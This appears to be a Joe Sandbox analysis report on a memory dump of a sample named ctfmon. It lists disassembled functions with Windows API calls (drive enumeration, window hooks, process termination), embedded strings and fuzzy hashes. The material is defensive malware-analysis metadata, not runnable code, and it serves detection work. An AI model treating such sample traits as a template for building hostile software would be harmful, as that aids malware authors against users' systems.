Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
Instruction ID: f2f89bb0e4747260c37c204fa35bc9d0ef2f952a0fe52942db453467d738cb5e
Opcode Fuzzy Hash: 1bbe7f5c98f481103e0da3ba9a6ba3310e5f518a3410d3f196074bbe7f85877f
Instruction Fuzzy Hash: 33113DB1A107608FD7249F7A988452ABBE5FB487047804D3FE18BC6B51DB78E4418F54

Function 00411AB2 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000100,K[A,00411A8A,K[A,K[A,00000100,00000000,00415B4B,00000000), ref: 00411AEC
GetLastError.KERNEL32 ref: 00411AF6

Strings

K[A, xrefs: 00411AB3, 00411AB8, 00411AE4, 00411B02
K[A, xrefs: 00411AB2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID: K[A$K[A
API String ID: 918212764-3551647969
Opcode ID: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
Instruction ID: 6524854afac2a70c962223058db7ab38a219dab8095493e29c0a91285f7820d6
Opcode Fuzzy Hash: 89eb0f5452d5d8246573299db4c61837e9694d72ece4d1da2cd1643f1eff998d
Instruction Fuzzy Hash: 8101A73361962056C62467B96C49EEB16644FC1375F25061FFB11D62F1EE2CA8C2815D

Function 00403D20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 00403D25
GetDriveTypeA.KERNEL32(?), ref: 00403D7E

Strings

%c:\, xrefs: 00403D67

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: DriveDrivesLogicalType
String ID: %c:\
API String ID: 4038169723-3142399695
Opcode ID: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
Instruction ID: 5a5b2ba27494c355ef28315322f719edc421758644ed9a5ba6575820666cadf4
Opcode Fuzzy Hash: 9dc73e3006044a7526e050ae8973abdfa3826bae856626810e2cb37736896c5e
Instruction Fuzzy Hash: A701A7629406009AC3119B08E89175BBFD99BE4311F54853FE88467380D67B994A87A9

Function 004203D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004203E8
SetWindowsHookExW.USER32(000000FF,0042072A,00000000,00000000), ref: 004203F8

Part of subcall function 00428C9A: __EH_prolog.LIBCMT ref: 00428C9F

Strings

8qj, xrefs: 00420403

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID: 8qj
API String ID: 2183259885-1316662731
Opcode ID: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
Instruction ID: 6bcf5cd4f4f4ddade5c49cae69e891880ade3d052de22ae2a353e1a51ef8f9c9
Opcode Fuzzy Hash: 5eaa8821a15602728f6c7bce36cfee05decd38d7f59ae19100c8a9dc53e0b684
Instruction Fuzzy Hash: 52F08231B02230ABD7203B71B95971D2AD0AF50715F9546AEF502975E2CE288841C76D

Function 0040DDAA Relevance: 4.6, APIs: 3, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0040DD95,?,00000000,00000000,0040D111,00000000,00000000), ref: 0040DDBF
TerminateProcess.KERNEL32(00000000,?,0040DD95,?,00000000,00000000,0040D111,00000000,00000000), ref: 0040DDC6
ExitProcess.KERNEL32 ref: 0040DE47

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 46bcc9cf34b78cd556bcc2f226b93e199ccd779cc67d6353b7bac2a829c7045d
Instruction ID: eb2bae5a7c05ae0f05409ec2047d6a94e59a826244f4d5dc0da0c2d2b805d8bd
Opcode Fuzzy Hash: 46bcc9cf34b78cd556bcc2f226b93e199ccd779cc67d6353b7bac2a829c7045d
Instruction Fuzzy Hash: 1F010C32D047019AD6216FA9FC8561E7BA5AFA0714F20003FF140672E0CB78584DDB99

Function 00403C80 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00403C91

Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E

Strings

I, xrefs: 00403CFD
+*&=^^^^--------DRIVE, xrefs: 00403CC8

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: DriveDrivesLogicalSleepType
String ID: +*&=^^^^--------DRIVE$I
API String ID: 998507393-3356893098
Opcode ID: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
Instruction ID: 49d0c6ced368fd66185a0629946516c02ffbc5c9166c48d24d2764af2432aa93
Opcode Fuzzy Hash: 6404bc3285479118a6d9aa39b9ca3365bf84b49e5fd7b4dc3ec66ac132270eda
Instruction Fuzzy Hash: 1A015E325043049BE700DF60D85165BBFE2AB98710F80483EF95A7B3C0DA769E09DB9A

Function 0042187E Relevance: 4.5, APIs: 3, Instructions: 34COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,?), ref: 00421887
SetWindowLongW.USER32(?,?,00408812), ref: 004218A6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,?,?,004218FE,00408812,000000EC,?,?,?,00408812,?), ref: 004218C0

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
Instruction ID: 46a18c6c3a5692cf3f7d8173769a82117a3993c78e402f77b7694b3d22f29e20
Opcode Fuzzy Hash: 3ee0e841910f72ad038163963a675ad57a9dba422b27fd7ec58bc383047907e9
Instruction Fuzzy Hash: 48F01C35210019BFDF18AF50EC959BF3B65EF14351B90842AF906C5170D731A962AAA8

Function 00420932 Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0042093F
TranslateMessage.USER32(?), ref: 0042095F
DispatchMessageW.USER32(?), ref: 00420966

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Message$CallbackDispatchDispatcherTranslateUser
String ID:
API String ID: 2960505505-0
Opcode ID: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
Instruction ID: fabc7a01dc3d71df9f254138b74deb61d15ffc8e1f8f1f232a1b835c48f4a5e8
Opcode Fuzzy Hash: b3613d69d856413218d6d1271ffd960b09534bfebe9e9f37242a4a3cb32dcde9
Instruction Fuzzy Hash: F6E092723005106FE3316B28AC98E7F37ECEF85B01784042EF402D2112CB649C82CA7A

Function 00421924 Relevance: 3.0, APIs: 2, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E

GetWindowRect.USER32(?,00421B1C), ref: 00421949
GetWindow.USER32(?,00000004), ref: 00421966

Part of subcall function 0042438F: IsWindowEnabled.USER32(?), ref: 00424399

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnabledLongRect
String ID:
API String ID: 3170195891-0
Opcode ID: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
Instruction ID: 3d44051e79cfe25b8d70dd5f5f519bbb07aa03c4fe1e1fb717501b8327a53114
Opcode Fuzzy Hash: effe7db21416aec86d5d1406498b371649853bace2238ba7ed55f32c8f800dca
Instruction Fuzzy Hash: 39015E707002289BDB21AB25E865B7E77A9AF61714F80486EED42973A1D738ED80C65C

Function 00412848 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,0053CB6B,00000000,00000000,00000000,0053CB6B,004126A5,0053CB6B,00000000,00000002,00000001,0053CB6B,?), ref: 00412872
GetLastError.KERNEL32 ref: 0041287F

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
Instruction ID: 10e19110f1e5badc9e720bb41e1b460c98416622eb2bcf91d42185f1d58b7cbf
Opcode Fuzzy Hash: 2bd6f2df571c30d8d268d01624ed3f6f81c3a9a6c1b2a642c7a8942a74d1f768
Instruction Fuzzy Hash: E0F02D3661421157CA247B78AC085DA37649F85334F21077BF531D72E1DF78C8A68359

Function 004291C6 Relevance: 3.0, APIs: 2, Instructions: 32COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000000,00000000,0042603E,00000000,00000000,00000000,00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108), ref: 004291CF
SetErrorMode.KERNEL32(00000000,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000,0040D108,00000000), ref: 004291D6

Part of subcall function 00429229: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A
Part of subcall function 00429229: lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
Part of subcall function 00429229: lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID:
API String ID: 3389432936-0
Opcode ID: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
Instruction ID: 0f0f40c96ee9f28d0d0ec8962dd78e8fd03b51d7b4fb64733512bf25de8db611
Opcode Fuzzy Hash: f71a52bd6f10f1c5d171d46f7e8e0ad32366ecb0e776d89220ff6f7025bbea85
Instruction Fuzzy Hash: 1AF04975A142209FD714EF65E485A0D7BE4AF44B10F45888FF8489B3A2CF78D840CF6A

Function 004103EB Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0040D087,00000001), ref: 004103FC

Part of subcall function 004102A3: GetVersionExA.KERNEL32 ref: 004102C2

HeapDestroy.KERNEL32 ref: 0041043B

Part of subcall function 00412D44: HeapAlloc.KERNEL32(00000000,00000140,00410424,000003F8), ref: 00412D51

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
Instruction ID: 497c8a25df3411b8ffde37235463325da3650acc20757d7ac2592f9ec469bdd4
Opcode Fuzzy Hash: dc0e4f96b9bfa2dfd241da328ae4e49f447cbd5b13466095a185e15b9ddf63a4
Instruction Fuzzy Hash: 00F06530B512119DDB645B70ED877FA2694DB9078EF24442BF684C91E1EBF884C5990A

Function 00422460 Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00422487
CallWindowProcW.USER32(?,?,?,?,?), ref: 0042249C

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ProcWindow$Call
String ID:
API String ID: 2316559721-0
Opcode ID: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
Instruction ID: 233a5364c896a44adc16a6cce7b45886d7cf299a5c9d453a734240230d2e1711
Opcode Fuzzy Hash: f688ebd1a0ae5da7d78c7a24aa8a1e7d28b38987f708924316816e99806330b5
Instruction Fuzzy Hash: 78F01C36200215FFCF219F95EC44D9A7BB9FF18360B448529FA4586120D772D920AB44

Function 00422096 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

GetCurrentThreadId.KERNEL32 ref: 004220B8
SetWindowsHookExW.USER32(00000005,Function_00021EF2,00000000,00000000), ref: 004220C8

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CurrentHookThreadValueWindows
String ID:
API String ID: 933525246-0
Opcode ID: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
Instruction ID: 17601e8b442b9b03c5e5566830a56eca268cea50e62353c77c62ba015712df01
Opcode Fuzzy Hash: 2a60e45d90dbc51d8dff187ae436cece9d4aa2d7a8c02c67daea1e4041fd0ec8
Instruction Fuzzy Hash: F5E0E531301720AFD2305B22AC05B1776E4EF80B11F90452FE205D1140D7B89846CB7D

Function 0040E14A Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 0040E231

Part of subcall function 0041257D: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125BA
Part of subcall function 0041257D: EnterCriticalSection.KERNEL32(?,?,?,0041400E,00000009,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 004125D5

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
Instruction ID: 9efc5791e0f1d7c9c186a67d883c5475a9d78367af9f374711ed2f43329d38d0
Opcode Fuzzy Hash: c2eccd4ad7c7d846102367b4257caf7ecf94ba4f496759abc678b985d4644e17
Instruction Fuzzy Hash: B9219A31A40215ABDB109BA6EC42BDE7768EB10724F14496FF410FB2D1C778A9918A98

Function 00421A74 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00421A79

Part of subcall function 00428C05: TlsGetValue.KERNEL32(00000000,?,00000000,004283FD,00427DD6,00428419,004203C5,0042601F,?,00000000,?,0041F96C,00000000,00000000,00000000,00000000), ref: 00428C44

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: H_prologValue
String ID:
API String ID: 3700342317-0
Opcode ID: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
Instruction ID: 9dde40da2586159c776057cb4fc6e6fed61ba2f5afb010fcb97a0dbd75fd19cc
Opcode Fuzzy Hash: 08febc6eb8c8e99cee7acacc4cfd95ba39e2bfe778b2f071883e8455ad0c05b3
Instruction Fuzzy Hash: D8219872A00229EFCF01DF94D482AEE7BB9FF14354F40406AF905AB250D778AE51CBA4

Function 00420F4C Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00420F84

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Parent
String ID:
API String ID: 975332729-0
Opcode ID: 096ca800010d018c2cbe0580766a8a0f22658b4df3f5255ea708dcb48673a043
Instruction ID: 550f0e8a84989d5d683be727cd5a6e25dc03dbd874991ceb634d077cd056d06a
Opcode Fuzzy Hash: 096ca800010d018c2cbe0580766a8a0f22658b4df3f5255ea708dcb48673a043
Instruction Fuzzy Hash: 8E01E5313403156F9F309E32EE45E7B7BE9EF85360B45061AFD01822D2D675DC119668

Function 00405040 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(76232F60), ref: 00405068

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
